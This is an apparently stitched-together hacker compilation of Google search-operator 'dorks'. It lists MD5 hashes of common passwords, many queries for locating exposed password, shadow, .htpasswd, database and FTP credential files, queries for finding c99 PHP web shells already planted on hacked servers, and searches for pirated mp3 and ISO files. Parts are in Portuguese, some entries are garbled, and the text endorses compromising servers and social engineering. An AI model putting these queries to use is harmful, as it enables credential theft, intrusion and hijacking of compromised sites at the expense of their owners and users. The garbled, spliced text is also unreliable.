"63a9f0ea7bb98050796b649e85481845" for root "098f6bcd4621d373cade4e832627b4f6" for test "3c3662bcb661d6de679c636744c66b62" for sex "f561aaf6ef0bf14d4208bb46a4ccb3ad" for xxx http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22%23mysql+dump%22+filetype%3Asql+21232f297a57a5a743894a0e4a801fc3&btnG=Search =========================================================================== "login: *" "password: *" filetype:txt c99.php [To Parent Directory] مهمه ============================================================================ Index of /bbs + Index of /tmp + Index of /dump + How To Search For Rapidshare Files Using Google This is a simple way to search for Rapidshare files using two special Google operators - site and inurl. The site operator limits the search to the site of your choosing, and the inurl operator tells the search engine only to return results with that particular keyword in the URL. Using this combination we can search for any number of different files on Rapidshare. For example: “site:rapidshare.de inurl:avi|wmv|mpg|mpeg|mp4 south park” will search the Rapidshare domain for video files with those particular extensions and the keywords “south park”. If you want to search for music or ringtones you could use “site:rapidshare.com inurl:mp3|wav|ogg|aac|au|midi [keywords]” replacing [keywords] with whatever song or artist you are looking for. Get sensitive information using Google Google's advanced syntax lets you expose many vulnerabilities and gather confidential or sensitive information. [ intitle: ] The “intitle:” syntax helps Google restrict the search results to pages containing that word in the title. For example, “intitle: login password” (without quotes) will return links to those pages that has the word "login" in their title, and the word "password" anywhere in the page. Similarly, if one has to query for more than one word in the page title then in that case “allintitle:” can be used instead of “intitle” to get the list of pages containing all those words in its title. For example using “intitle: login intitle: password” is same as querying “allintitle: login password”. [ inurl: ] The “inurl:” syntax restricts the search results to those URLs containing the search keyword. For example: “inurl: passwd” (without quotes) will return only links to those pages that have "passwd" in the URL. Similarly, if one has to query for more than one word in a URL then in that case “allinurl:” can be used instead of “inurl” to get the list of URLs containing all those search keywords in it. For example: “allinurl: etc/passwd“ will look for the URLs containing “etc” and “passwd”. The slash (“/”) between the words will be ignored by Google. [ site: ] The “site:” syntax restricts Google to query for certain keywords in a particular site or domain. For example: “exploits site:hackingspirits.com” (without quotes) will look for the keyword “exploits” in those pages present in all the links of the domain “hackingspirits.com”. [ filetype: ] This “filetype:” syntax restricts Google search for files on internet with particular extensions (i.e. doc, pdf or ppt etc). For example: “filetype:doc site:gov confidential” (without quotes) will look for files with “.doc” extension in all government domains with “.gov” extension and containing the word “confidential” either in the pages or in the “.doc” file. i.e. the result will contain the links to all confidential word document files on the government sites. [ link: ] “link:” syntax will list down webpages that have links to the specified webpage. For Example: “link:www.securityfocus.com” will list webpages that have links pointing to the SecurityFocus homepage. [ related: ] The “related:” will list web pages that are "similar" to a specified web page. For Example: “related:www.securityfocus.com” will list web pages that are similar to the Securityfocus homepage. Note there can be no space between the "related:" and the web page url. [ cache: ] The query “cache:” will show the version of the web page that Google has in its cache. For Example: “cache:www.hackingspirits.com” will show Google's cache of the Google homepage. If you include other words in the query, Google will highlight those words within the cached document. For Example: “cache:www.hackingspirits.com guest” will show the cached content with the word "guest" highlighted. [ intext: ] The “intext:” syntax searches for words in a particular website. It ignores links or URLs and page titles. For example: “intext:exploits” (without quotes) will return only links to those web pages that has the search keyword "exploits" in its webpage. [ phonebook: ] “phonebook” searches for U.S. street address and phone number information. For Example: “phonebook:Lisa+CA” will list down all names of person having “Lisa” in their names and located in “California (CA)”. This can be used as a great tool for hackers incase someone want to do dig personal information for social engineering. Using “Index of ” syntax to find sites enabled with Index browsing A webserver with Index browsing enabled means anyone can browse the webserver directories like ordinary local directories. Some interesting searches: Index of /admin Index of /passwd Index of /password Index of /mail "Index of /" +passwd "Index of /" +password.txt "Index of /" +.htaccess "Index of /root" "Index of /cgi-bin" "Index of /logs" "Index of /config" Looking for vulnerable sites or servers using “inurl:” or “allinurl:” a. Using “allinurl:winnt/system32/” (without quotes) will list down all the links to the server which gives access to restricted directories like “system32” through web. If you are lucky enough then you might get access to the cmd.exe in the “system32” directory. Once you have the access to “cmd.exe” and are able to execute it then you can go ahead in further escalating your privileges over the server and compromise it. b. Using “allinurl:wwwboard/passwd.txt”(without quotes) in the Google search will list down all the links to the server which are vulnerable to “WWWBoard Password vulnerability”. To know more about this vulnerability you can have a look at the following link: http://www.securiteam.com/exploits/2BUQ4S0SAW.html c. Using “inurl:.bash_history” (without quotes) will list down all the links to the server which gives access to “.bash_history” file through web. This is a command history file. This file includes the list of command executed by the administrator, and sometimes includes sensitive information such as password typed in by the administrator. d. Using “inurl:config.txt” (without quotes) will list down all the links to the servers which gives access to “config.txt” file through web. This file contains sensitive information, including the hash value of the administrative password and database authentication credentials. Other similar search using “inurl:” or “allinurl:” combined with other syntaxs inurl:admin filetype:txt inurl:admin filetype:db inurl:admin filetype:cfg inurl:mysql filetype:cfg inurl:passwd filetype:txt inurl:"wwwroot/*." inurl:adpassword.txt inurl:webeditor.php inurl:file_upload.php inurl:gov filetype:xls "restricted" index of ftp +.mdb allinurl:/cgi-bin/ +mailto Looking for vulnerable sites or servers using “intitle:” or “allintitle:” a. Using [allintitle: "index of /root”] (without brackets) will list down the links to the web server which gives access to restricted directories like “root” through web. This directory sometimes contains sensitive information which can be easily retrieved through simple web requests. b. Using [allintitle: "index of /admin”] (without brackets) will list down the links to the websites which has got index browsing enabled for restricted directories like “admin” through web. Most of the web application sometimes uses names like “admin” to store admin credentials in it. This directory sometimes contains sensitive information which can be easily retrieved through simple web requests. http://storage.cet.ac.il/CetForums/Storage/MessageFiles/93/17387/Forum17387M634I1.php ============================================================================ skip to main | skip to sidebar L05T Sábado, 16 de Dezembro de 2006 index of Opções de Buscas. Filetype: Você pode procurar por arquivos especificos do seguinte modo : . :*.xls, *.doc, *.pdf, *.ps, *.ppt, *.rtf, *.db, *.mdb, *.cfg, *.pwd, *.dat , etc. usando ex.: Filetype:xls "pass" Inurl: Você pode com uma especifica palavra, e retornar as urls contendo as palavras. - usando ex.: inurl:admin "Index of": voce pode encontrar pastas especificas dentro de servidores usando ex.: "index of" admin ou index.of.admin Site: você pode encontrar sites especificos (dominios) ex. *.com, *.org, *.mi, *.gov, etc. - usando ex.: site:gov ou site:gov "cyprus" Intitle: - usa-se para achar uma URL que contenha no titulo as palavras que você pesquisar. ex.: intitle:BEL Você pode conseguir muitas informações e copiar arquivos direto dos servidores veja os exemplos. tente procurar por : * inurl:gov filetype:xls "restricted" (retornará por arquivos do governo com excel contendo palavras "restricted". * inurl:admin.cfg (admin.cfg, arquivo de configuração de admin, contendo passwords, o arquivo contem informações sigilosas). * Webadmin: (Isso é um pequeno software em que a maioria dos administradores usam para fazer o upload de arquivos remotos. usaando ex. inurl:file_upload.php) * Content Manager Systems: São softwares que o administrador edita o conteudo do site facilmente, os nomes deles a maioria das veses são : panel.html , cms.html , control.cfg , basta usar na opção inurl. inurl:admin inurl: |userlist Generic userlist files --------------------------------------------------------- inurl:admin filetype: |asp Generic userlist files inurl:userlist | --------------------------------------------------------- inurl:php inurl: |Half-life statistics file, lists username and hlstats intext: |other information Server Username | --------------------------------------------------------- filetype:ctl | inurl:haccess. |alent of hcess c |shows Web user credentials --------------------------------------------------------- filetype:reg | reg intext: |Mger can --------------------------------------------------------- "internet account manager" |reveal usernames and more filetype:wab wab |Mdress |books --------------------------------------------------------- filetype:mdb inurl:profiles |Msning |profiles. --------------------------------------------------------- index.of perform.ini |mIRC IRC ini file can list IRC usernames and |other information --------------------------------------------------------- inurl:root.asp?acs=anon |O directory can be |used to discover usernames --------------------------------------------------------- filetype:conf inurl:proftpd. |PROFTP FTP server configuration file conf –sample |reveals |username and server information --------------------------------------------------------- filetype:log username --------------------------------------------------------- filetype:rdp rdp |Remote Desktop Connection files reveal user |credentials --------------------------------------------------------- intitle:index.of |UNIX bash shell history reveals commands .bash_history |typed at a bash command prompt; usernames |are often typed as argument strings --------------------------------------------------------- intitle:index.of |UNIX shell history reveals commands typed at .sh_history |a shell command prompt; usernames are |often typed as argument strings --------------------------------------------------------- "index of " lck |Various lock files list the user currently using |a file --------------------------------------------------------- +intext:webalizer +intext: |Webalizer Web statistics page lists Web user- Total Usernames +intext: |names and statistical information "Usage Statistics for" --------------------------------------------------------- filetype:reg reg HKEY_ |orts can reveal CURRENT_USER |username usernames and other information --------------------------------------------------------- --------------------------------------------------------- inurl:/db/main.mdb | passwords --------------------------------------------------------- filetype:cfm "cfapplication | source with potential passwords name" password --------------------------------------------------------- filetype:pass |dbman credentials pass intext:userid --------------------------------------------------------- allinurl:auth_user_file.txt |DCForum user passwords --------------------------------------------------------- --------------------------------------------------------- filetype:ini inurl:flashFXP.ini |FlashFXP FTP credentials --------------------------------------------------------- filetype:url +inurl:"ftp://" |FTP bookmarks cleartext passwords +inurl:"@" --------------------------------------------------------- inurl:zebra.conf intext: | passwords password -sample -test -tutorial –download --------------------------------------------------------- filetype:htpasswd htpasswd |HTTP htpasswd Web user credentials --------------------------------------------------------- intitle:"Index of" ".htpasswd" |HTTP htpasswd Web user credentials "htgroup" -intitle:"dist" -apache -htpasswd.c --------------------------------------------------------- intitle:"Index of" ".htpasswd" |HTTP htpasswd Web user credentials htpasswd.bak --------------------------------------------------------- "http://*:*@www" bob:bob |HTTP passwords (bob is a sample username) --------------------------------------------------------- "sets mode: +k" |IRC channel keys (passwords) --------------------------------------------------------- "Your password is * |Remember IRC NickServ registration passwords this for later use" --------------------------------------------------------- signin filetype:url |JavaScript authentication credentials --------------------------------------------------------- --------------------------------------------------------- inurl:lilo.conf filetype:conf |LILO passwords password -tatercounter2000 -bootpwd –man --------------------------------------------------------- filetype:config config intext: |Microsoft .NET application credentials appSettings "User ID" --------------------------------------------------------- filetype:pwd service | --------------------------------------------------------- intitle:index.of |s.pwd --------------------------------------------------------- "# -Fge-" |rds inurl:service.pwd ext:pwd inurl:_vti_pvt inurl: |Mi passwords (Service | authors | administrators) --------------------------------------------------------- inurl:perform filetype:ini |mIRC nickserv credentials --------------------------------------------------------- intitle:"index of" intext: |mySQL database credentials connect.inc --------------------------------------------------------- intitle:"index of" intext: |mySQL database credentials globals.inc --------------------------------------------------------- filetype:conf oekakibbs |Oekakibss user passwords --------------------------------------------------------- filetype:dat wand.dat |Opera‚ ÄúMagic Wand‚Äù Web credentials --------------------------------------------------------- inurl:ospfd.conf intext: |OSPF Daemon Passwords password -sample -test -tutorial –download --------------------------------------------------------- index.of --------------------------------------------------------- inurl:list.txt --------------------------------------------------------- filetype:dat "password.dat" |password.dat files --------------------------------------------------------- inurl:password.log filetype:log |password.log file reveals usernames, |passwords,and hostnames --------------------------------------------------------- filetype:log inurl:"password.log" |password.log files cleartext |passwords --------------------------------------------------------- inurl:pple.lst filetype:lst | --------------------------------------------------------- intitle:index.of config.php |PHP Configuration File database |credentials --------------------------------------------------------- inurl:config.php dbuname dbpass |PHP Configuration File database |credentials --------------------------------------------------------- --------------------------------------------------------- filetype:conf inurl:psybnc.conf |psyBNC IRC user credentials "USER.PASS=" --------------------------------------------------------- fals --------------------------------------------------------- filetype:conf slapd.conf |slapd configuration files root password --------------------------------------------------------- inurl:"slapd.conf" intext: |slap "credentials" -manpage -"Manual Page" -man: -sample --------------------------------------------------------- inurl:"slapd.conf" intext: |sla "rootpw" -manpage -"Manual Page" -man: -sample --------------------------------------------------------- filetype:sql "IDENTIFIED BY" –cvs |SQL passwords --------------------------------------------------------- filetype:sql password |SQL passwords --------------------------------------------------------- filetype:ini wcx_ftp |Total Commander FTP passwords --------------------------------------------------------- filetype:netrc password |UNIX .netrc user credentials --------------------------------------------------------- index.of.etc |UNIX /etc directories contain |various credential files --------------------------------------------------------- intitle:"Index of..etc" passwd |UNIX /etc/passwd user credentials --------------------------------------------------------- intitle:index.of passwd |UNIX /etc/passwd user credentials passwd.bak --------------------------------------------------------- intitle:"Index of" pwd.db |UNIX /etc/pwd.db credentials --------------------------------------------------------- intitle:Index.of etc shadow |UNIX /etc/shadow user credentials --------------------------------------------------------- intitle:index.of master.passwd |UNIX master.passwd user credentials --------------------------------------------------------- intitle:"Index of" spwd.db |UNIX spwd.db credentials passwd -pam.conf --------------------------------------------------------- filetype:bak inurl:"htaccess| |UNIX various password file backups passwd|shadow|htusers --------------------------------------------------------- filetype:inc dbconn |Various database credentials --------------------------------------------------------- filetype:inc intext:mysql_ |Various database credentials, server names connect --------------------------------------------------------- filetype:properties inurl:db |Various database credentials, server names intext:password --------------------------------------------------------- inurl:vtund.conf intext:pass –cvs |n passwords --------------------------------------------------------- inurl:"wvdial.conf" intext: |wdial dialup user credentials "password" --------------------------------------------------------- filetype:mdb wwforum |Ws Web credentials --------------------------------------------------------- "AutoCreate=TRUE password=*" |Website Access Analyzer user passwords --------------------------------------------------------- filetype:pwl pwl |Windows Password List user credentials --------------------------------------------------------- filetype:reg reg +intext: |Winy Keys containing user "defaultusername" intext: |credentials "defaultpassword" --------------------------------------------------------- filetype:reg reg +intext: |Winy Keys containing user "internet account manager" |credentials --------------------------------------------------------- "index of/" "ws_ftp.ini" |WS_FTP FTP credentials "parent directory" --------------------------------------------------------- filetype:ini ws_ftp pwd |WS_FTP FTP user credentials --------------------------------------------------------- inurl:/wwwboard |wwwboard user credentials - >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>. intitle:"Index of" passwords modified allinurl:auth_user_file.txt "access denied for user" "using password" "A syntax error has occurred" filetype:ihtml allinurl: admin mdb "ORA-00921: unexpected end of SQL command" inurl:passlist.txt "Index of /backup" "Chatologica MetaSearch" "stack tracking:" "parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums "parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums "parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums "parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums "parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums "parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums >METHOD 2 put this string in search: ?intitle:index.of? mp3 You only need add the name of the song/artist/singer. Example: ?intitle:index.of? mp3 name >METHOD 3 put this string in e search: inurl:microsoft filetype:iso You can change the string to watever you want, ex. microsoft to adobe, iso to zip etc… "# -FrPge-" inurl:service.pwd Frontpage passwords.. very nice clean search results listing !! "Aute=TRUE password=*" "http://*:*@www" domainname This is a query to get inline passwords from search engines (not just le), you must type in the query followed with the the domain name without the .com or .net "http://*:*@www" bangbus or "http://*:*@www"bangbus Another way is by just typing "http://bob:bob@www" "sets mode: +k" This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs. allinurl: admin mdb Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are! allinurl:auth_user_file.txt intitle:"Index of" config.php eggdrop filetype:user user These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users. intitle:index.of.etc filetype:bak inurl:"htaccess|passwd|shadow|htusers" This will search for backup files (*.bak) created by some editors or even by the administrator >>>>>>>>>>>>>>>>>>>>>>>>>> = Index ---------------------------------------------------------------------- 0) Key 1) Directories 2) Xitami Servers 3) Directory Listing 4) Andromeda Servers 5) Zina Artists 6) Apache mp3 Servers 7) Individual Songs ---------------------------------------------------------------------- = Section 0 - KEY ---------------------------------------------------------------------- You this are just some definitions I will use below. [Directory String] can be any of the following : 1) "index of" 2) "last modified" 3) "parent of" [file type] can be any of the following : 1) "mp3" 2) "shn" 3) "wma" [mp3 name] can be any of the following : 1) the name of the album in quotes 2) the name of the artist in quotes 3) be daring and leave it blank and have lots of links 4) be creative! [limitors] 1) -html -htm -php -asp -txt -pls (inurl:) is optional and may be omitted and in fact most be omitted if not using a search tool other than000. (intitle:) can be used in place of (inurl:) and has a similar effect again you must be useing000e. (-filetype:txt) adding this to the end of your search string can filter some false positives. (-playlist) adding this to the end of your search string can filter some false positives. ---------------------------------------------------------------------- = Section 1 - Directories ---------------------------------------------------------------------- These are the most common way that mp3s are stored on the www, you should try these strings first. String Format : Type 1 : [Directory String] + (inurl:)[file type] + [mp3 name] Type 2 : [Directory String] + (intitle:)[file type] + [mp3 name] Type 3 : [Directory String] + [file type] + [mp3 name] + [limitors] Example Strings : - intitle:index.of + mp3 + "grandaddy" -html -htm -php -asp -txt -pls - "index of" + "mp3" + "radiohead" -html -htm -php - "index of" + mp3 + "grandaddy" - "index of" + inurl:mp3 + "beatles" -txt -pls - "index of" + intitle:mp3 + beatles - "last modified" + "shn" + "dylan" - "last modified" + inurl:shn + "bob dylan" - "parent of" + inurl:wma + "grandaddy" Suggestions : - Try (intitle:index.of + "mp3" + "band name" -htm -html -php -asp) first it is usually the most effective. Another Little Trick: - If you have been getting alot of results on 0000 but the pages don't seem to be there try adding dates and the "apache" string to your search i.e. - intitle:index.of + mp3 + "grandaddy" -html -htm -php -asp apache feb-2005 - intitle:index.of + mp3 + "grandaddy" -html -htm -php -asp apache 2005 or if you just want a big list of mp3' doing a search like this everymonth - intitle:index.of + mp3 + -html -htm -php -asp apache mar ---------------------------------------------------------------------- = Section 2 - Xitami Servers ---------------------------------------------------------------------- String Format : Type 1 : "xitami web server" + (inurl:)[file type] + [mp3 name] Type 2 : "xitami web server" + (intitle:)[file type] + [mp3 name] Example Strings : - "xitami web server" + "mp3" + "radiohead" - "xitami web server" + intitle:shn + "beatles" - "xitami web server" + inurl:mp3 + "magnetic fields" ---------------------------------------------------------------------- = Section 3 - Directory Listing ---------------------------------------------------------------------- String Format : Type 1 : "directory listings" + (inurl:)[file type] + [mp3 name] Type 2 : "directory listings" + (intitle:)[file type] + [mp3 name] Type 3 : "directory listings of" + (inurl:)[file type] + [mp3 name] Type 4 : "directory listings of" + (intitle:)[file type] + [mp3 name] Example Strings - "directory listings" + "mp3" + "radiohead" - "directory listings" + intitle:shn + "beatles" - "directory listings" + inurl:mp3 + "magnetic fields" - "directory listings of" + "mp3" + "radiohead" - "directory listings of" + intitle:shn + "beatles" - "directory listings of" + inurl:mp3 + "magnetic fields" ---------------------------------------------------------------------- = Section 4 - Andromeda Servers ---------------------------------------------------------------------- String Format : Type 1 : "scott matthews" + andromeda + [mp3 name] Type 2 : "scott matthews" + andromeda + [file type] + [mp3 name] Type 3 : "powered by andromeda" + [mp3 name] Type 4 : "powered by andromeda" + [file type] + [mp3 name] Type 5 : inurl:andromeda.php + [mp3 name] Type 6 : inurl:anromeda.php + [file type] + [mp3 name] Type 7 : "scott matthews" Type 8 : "powered by andromeda" Type 9 : inurl:andromeda.php Examples : - "scott matthews" + andromeda + "radiohead" - "scott matthews" + andromeda + "mp3" + "fitter" - "powered by andromeda" + "gradaddy" - "powered by andromeda" + "mp3" + "just like women" - inurl:andromeda.php + "shn" - inurl:anromeda.php + "wma" + "dylan" - "scott matthews" - "powered by andromeda" - inurl:andromeda.php ---------------------------------------------------------------------- = Section 5 - Zina Artists ---------------------------------------------------------------------- String Format : Type 1 : "zina artists" Examples : - "zina artists" ---------------------------------------------------------------------- = Section 6 - Apache mp3 Servers ---------------------------------------------------------------------- String Format : Type 1 : "stream all" + apache + [mp3 name] Type 2 : "stream all" + apache Type 3 : "shuffle all" + apache + [mp3 name] Type 4 : "shuffle all" + apache Examples : - "stream all" + apache - "stream all" "shuffle all" mp3 - "stream all" + apache + radiohead - "shuffle all" + beatles ---------------------------------------------------------------------- = Section 7 - Individual Songs ---------------------------------------------------------------------- Format : [mp3 name].mp3 -playlist -filetype:txt Examples : - "ok_computer_live.mp3" -playlist -filetype:txt - "*ok_computer*.mp3" -playlist -filetype:txt - kid*a.mp3 -playlist -filetype:txt Postado por <> às 08:12 0 comentários: Postar um comentário Postagem mais recente Início Assinar: Postar comentários (Atom) free web counter Arquivo do blog * ▼ 2006 (3) o ▼ Dezembro (3) + index + index of Quem sou eu <> Visualizar meu perfil completo =========================================================================== http://www.google.com/search?hl=de&q=www.my-spy.de&lr= =========================================================================== powered by captain crunch security team shell kuwait hacker php safe-mode bypass (list directories): safe-mode: off (not secure) safe-mode: off (not secure) drwxrwxrwx c99shell startpar -f hs_kuwait.php lejeune interpolate name asc. size · modify · owner/group · perms action shell c99 ccteam.r .phpact=f shell 00007458 zip allintext:â€�safe-mode: off (not secure) allintitle: c99memoryl allinurl:upload3.php astro acrobat basel basel stellar library c99memory c99memoryl c99shell v. 1.0 pre-release build #16 class-efem efemerides del 22 de abril encoder bind proc. ftp brute sec. sql php- encoder bind proc. ftp brute sec. sql php-code feedback encoder bind proc. ftp brute sec. sql php-code update feedback encoder tools proc. ftp brute sec. sql php-code update feedback filetype:php shell foreach (array(sortsql_sort) as $v) i.s.s.w team … inurl:ftpquickbrute inurl:php drwxrwxr-x ftp brute sql lejeune interpolation lejuene interpolate lmgrd_start 47 mysqld usage of cpu suse httpd2-prefork php echo getenv php4 “registered stream socket transportsâ€� powered by captain crunch filetype:php powered by captain crunch security team drwxrwxrwx powered by captain crunch security team | http://ccteam.ru | safe mode : off (not secure) safe-mode: select action/file-type: software make dir upload file safe-mode uid=30(wwwrun) gid=8(www) Надеюсь что эта информация будет кому-то полезна... -============================- دورك مهم للشل п»ї + п»ї drwxrwxrwx + c99.php cgi-bin" drwxrwxrwx + róót > c99shell > Śmietnik by róót > bblog.pl + =========================== -========================- shell. root::0:0:root:/root:/bin